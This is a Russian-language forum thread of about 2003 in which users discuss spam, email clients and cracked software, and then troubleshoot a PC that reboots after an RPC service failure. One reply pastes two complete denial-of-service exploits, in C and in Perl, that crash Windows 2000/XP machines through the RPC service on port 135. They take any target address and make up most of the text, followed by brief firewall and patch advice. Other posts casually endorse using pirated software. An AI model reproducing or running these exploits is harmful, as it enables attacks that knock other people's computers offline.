![]() |
Цитата:
качни последний "BAT", Бэтменом, конечно не станешь, но прога самое то!!! |
Цитата:
|
Цитата:
из них в качестве помойки, захожу разок в 2 недели и подчищаю, веришь ли, по 300-400 писем: сплошной спам! А основной адресок чист- не свечу я его, только для друзей! |
Да , правильно Спектр говорит , можно поставить фильтр , чтоб к тебе приходили лишь из списка , а представьте , кто-то поменял свои адрес и с нового строчит ....
У меня в плане вот че есть ... когда не лень будет , поменяю адресок на новыи , но потом буду ходить на саиты под программои , кот , не позволяет шпионить , ну т.е. ты вписываешь туда определенные саиты , где ты чаще всего , и для роботов- шпионов , твои данные , скрыты !!!! Если ето получится - !!!! |
Цитата:
|
Цитата:
ссср никто не пользуется лицензионными прогами, т.к. практически на любую есть крэк. "The Bat" - не исключение:) ЗЫ: Я, кстати, тоже выиграл АVP Касперского( лиценз.), ответив на какую-то байду в газете! Было это перед Новым годом, принесли лично :crazy: Но Каспер тормозит, и недавно перешёл на Dr.Web |
Цитата:
|
Цитата:
прогами, но дело не в привередливости- дело в ценах на такой товар... Конечно, это выглядит халявно, но когда в продаже тот же WinXP Pro за 450$, да Office по такой же цене, а рядом свободно предлагают корпоративный, абсолютно не отличающийся от оригинала диск за 5$...не знаю... Вообщем, дело совести :shy: Но за эти 800-900 баксов(плата за лицензию) спокойно куплю отличный комп:crazy: |
У меня 5 ящиков с сидюками .... если б все было лицензионным ... это же целое состояние !!! :biggrin:
|
нет, персона не одна... И пост названный предыдущим не является ответом на пост обращённый к GriKo... :argue:
|
Опять проблемы
Я незнаю, что с моим компьютером, но только я с вашей помощью все наладила, какое-то время наслаждалась спокойной работой на компьютере, но недавно началось опять черте-что. Сначала я непоняла почему когда нажимаешь на Пуск (Start) далее All Programs, он выдает сообщение якобы нет места, чтобы показать все программы которые у вас здесь подключены, это странно, потому что места достаточно. А потом иногда сам по себе и всегда когда запускаешь Disk Defragmenter через какое-то время выскакивает окошко, что Remote Procedure Call (RPC) service terminated unexpe...., компьютер должен быть перезагружен, вам 1 минута, чтобы сохранить все. что-то вроде так, если это важно то запущу еще раз Disk Defragmenter и запишу точно.
Вообщем бардак какой-то. Вот. Помогите кто может PLS, а то я ничего не понимаю, что компьютер от меня хочет. :frfr: |
Совсем беда 10-15 минут в Инете и выскакивает окошко, что This system is shutting down. Please save all work in progress and log off. Any unsaved changes will be lost. This shutdown was initiated by NT AUTHORITY\SYSTEM.
Message: Remote Procedure Call (RPC) service terminated unexpectedly. И через минуту перезагружается компьютер! Попробовала выключить кабельный модем, это прекратилось, но как включаю опять начинается. :hlp: |
Либо это что-то в регистре , либо ... слухом не вирус ???
|
Что делать?
|
Не бойся, eglantine. Дело в том, что кто-то очень злобный, видимо, сканит вашу зону прова и вызывает так называемый RPC сервис - Remote Procedure Call (Вызов удаленной процедуры). RPC - это технология, используемая при работе распределенных приложении и позволяющая приложению выполнять процедуры на другой машине в сети. Управление достается на уровне аутентификации путем использование специальных шелл-кодов. Даже приведу код эксплоита на СИ:
#include <winsock2.h> #include <stdio.h> #pragma comment(lib, "ws2_32.lib") char sendcode1[] = "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\ x02\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x0 1\x00\x00\x00\x00\x00\x01\x00\x60\x9e\xe7\xb9\x52\ x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f\x02\x0 0\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\ x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x0 0\x01\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\ x00\x20\x27\x01\x00\x00\x00\x02\x00\xf0\x00\x00\x0 0\x00\x00\x00\x00\xf0\x00\x00\x00"; char sendcode2[] = "\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00" ; char sendcode3[] = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x0 0\x00\x00\x00\x00\x02\x00\x00"; char sendcode4[] = "\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\ x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3 d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x05\x00\x00\x00\x10\ x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00\x50\x1 0\x01\x00\x00\x00\x02\x00"; char sendcode5[] = "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\ x8f\x00\x00\x00\x80\xf9\x00\x00\x00\x00\x02\x00"; char sendcode6[] = "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\ x8f\x00\x00\x00\xb0\xe2\x00\x00\x00\x00\x02\x00"; char sendcode7[] = "\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\ x8f\x00\x00\x00\x60\x15\x00\x00\x00\x00\x02\x00"; char sendcode8[] = "\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\ x00\x00"; int main(int argc, char *argv[]) { WSADATA wsaData; WORD wVersionRequested; struct hostent *pTarget; struct sockaddr_in sock; char *targetip; int port,bufsize; SOCKET s; char buffer[20480]; printf("========================= HUC Win2000/XP RPC Nuke V0.10 =======================\r\n"); printf("================= By Lion, Welcome to http://www.cnhonker.com =================\r\n\n"); if (argc < 2) { printf("Usage:\r\n"); printf(" %s <TargetIP> [TargetPort]\r\n", argv[0]); printf("Example:\r\n"); printf(" %s 192.168.0.1\r\n", argv[0]); printf(" %s 192.168.0.1 135\r\n", argv[0]); printf("PS:\r\n"); printf(" If target is XP, try 2 times.\r\n"); exit(1); } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; targetip = argv[1]; port = 135; if (argc >= 3) port = atoi(argv[2]); bufsize = 512; if (argc >= 4) bufsize = atoi(argv[3]); s = socket(AF_INET, SOCK_STREAM, 0); if(s==INVALID_SOCKET) { printf("Socket error!\r\n"); exit(1); } printf("Resolving Hostnames...\n"); if ((pTarget = gethostbyname(targetip)) == NULL) { printf("Resolve of %s failed, please try again.\n", argv[1]); exit(1); } memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons((USHORT)port); printf("Connecting...\n"); if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) ))) { printf("Couldn't connect to host.\n"); exit(1); } printf("Connected!...\n"); printf("Sending Packets...\n"); if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1) { printf("Error sending nuke Packets\r\n"); closesocket(s); exit(1); } memset(&buffer, '\x41', 240); send(s, buffer, 240, 0); send(s, sendcode2, sizeof(sendcode2)-1, 0); memset(&buffer, '\x42', 5000); send(s, buffer, 5000, 0); send(s, sendcode3, sizeof(sendcode3)-1, 0); memset(&buffer, '\x43', 512); send(s, buffer, 512, 0); send(s, sendcode4, sizeof(sendcode4)-1, 0); memset(&buffer, '\x44', 5000); send(s, buffer, 5000, 0); send(s, sendcode5, sizeof(sendcode5)-1, 0); memset(&buffer, '\x45', 5000); send(s, buffer, 5000, 0); send(s, sendcode6, sizeof(sendcode6)-1, 0); memset(&buffer, '\x46', 5000); send(s, buffer, 5000, 0); send(s, sendcode7, sizeof(sendcode7)-1, 0); memset(&buffer, '\x47', 5000); send(s, buffer, 5000, 0); send(s, sendcode8, sizeof(sendcode8)-1, 0); memset(&buffer, '\x48', 5000); send(s, buffer, 5000, 0); printf("Nuked! \r\nIf target is XP, try a again! :)\r\n"); closesocket(s); WSACleanup(); return 0; } И даже нашел на Перле: #!/usr/bin/perl # MS WIN 2000/XP RPC DoS exploit # by r3d_Dr4g0n [n-force group] # mailto: r3d_dr4g0n@mail.ru # original code on C by lion $sendcode1 = "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\ x02\x00\x00\x00". "\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\ x00\x00\x01\x00". "\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\ x69\x01\x29\x3f". "\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\ x9f\xe8\x08\x00". "\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\ x10\x00\x00\x00". "\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\ x00\x00\x02\x00". "\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00" ; $sendcode2 = "\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00" ; $sendcode3 = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\ x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\ x00\x02\x00\x00"; $sendcode4 = "\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\ x3d\x3d\x3d\x3d". "\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\ x3d\x3d\x3d\x3d". "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\ x8f\x00\x00\x00". "\x50\x10\x01\x00\x00\x00\x02\x00"; $sendcode5 = "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\ x8f\x00\x00\x00". "\x80\xf9\x00\x00\x00\x00\x02\x00"; $sendcode6 = "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\ x8f\x00\x00\x00". "\xb0\xe2\x00\x00\x00\x00\x02\x00"; $sendcode7 = "\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\ x8f\x00\x00\x00". "\x60\x15\x00\x00\x00\x00\x02\x00"; $sendcode8 = "\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\ x00\x00"; if(@ARGV < 1) { usage(); } nukem($ARGV[0],$ARGV[1]); sub nukem { use Socket; my $remote = shift; my $port = shift; my($buffer,$paddr,$proto,$iaddr); if(!defined($port)) { $port=135 } #$iaddr = inet_aton($remote) or die "Error: $!"; print "Resolving host...\n"; if(!($iaddr = gethostbyname($remote))) { print "Can't resolve $remote, please try again.\n"; #exit; return 0; } $paddr = sockaddr_in($port, $iaddr) or die "Error: $!"; $proto = getprotobyname('tcp') or die "Error: $!"; if(!socket(SOCK, PF_INET, SOCK_STREAM, $proto)) { print "Socket error !\n"; #exit; return 0; } print "Connecting...\n"; if(!connect(SOCK, $paddr)) { print "Couldn't connect to host.\n"; #exit; return 0; } print "Connected...\n"; print "Sending packets...\n"; if(!send(SOCK,$sendcode1,0)) { print "Error sending nuke packets !\n"; #exit; return 0; } $buffer = "\x41" x 240; send(SOCK,$buffer,0); send(SOCK,$sendcode2,0); $buffer = "\x42" x 5000; send(SOCK,$buffer,0); send(SOCK,$sendcode3,0); $buffer = "\x43" x 512; send(SOCK,$buffer,0); send(SOCK,$sendcode4,0); $buffer = "\x44" x 5000; send(SOCK,$buffer,0); send(SOCK,$sendcode5,0); $buffer = "\x45" x 5000; send(SOCK,$buffer,0); send(SOCK,$sendcode6,0); $buffer = "\x46" x 5000; send(SOCK,$buffer,0); send(SOCK,$sendcode7,0); $buffer = "\x47" x 5000; send(SOCK,$buffer,0); send(SOCK,$sendcode8,0); $buffer = "\x48" x 5000; send(SOCK,$buffer,0); print "Nuked !\n"; close(SOCK); return 1; } sub usage { $d = ":" x 23; print $d."[ MS WIN 2000/XP RPC DoS Exploit ]".$d."\n"; print $d."[ by r3d_Dr4g0n ]".$d."\n"; print "Usage:\n"; print " $0 <Addr> [Port]\n"; print "Example:\n"; print " $0195.46.50.1\n"; print " $0195.46.50.1135\n"; print " $0 www.lame.com\n"; exit; } Дело в том, что RPC сервис слушается на портах TCP/UDP 135, 139, 445. Просто ставишь файрволл, которому указываешь, что на данный порт блокировать все обращения. Кроме того лучше еще бы и заблокировать работу модулей DCOM. REmindER добавил(а) [date]1060710672[/date]: Да, еще. На данные момент в системе RPC обнаружена ошибка Buffer Overrun In RPC Interface Could Allow Code Execution (823980), позволяющая на удаленной машине выполнить какой-либо программый код. Для решения этой проблемы выпустили патч. Ссылка: http://www.microsoft.com/technet/tre...n/ms03-026.asp |
Текущее время: 14:10. Часовой пояс GMT +3. |
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc. Перевод: zCarot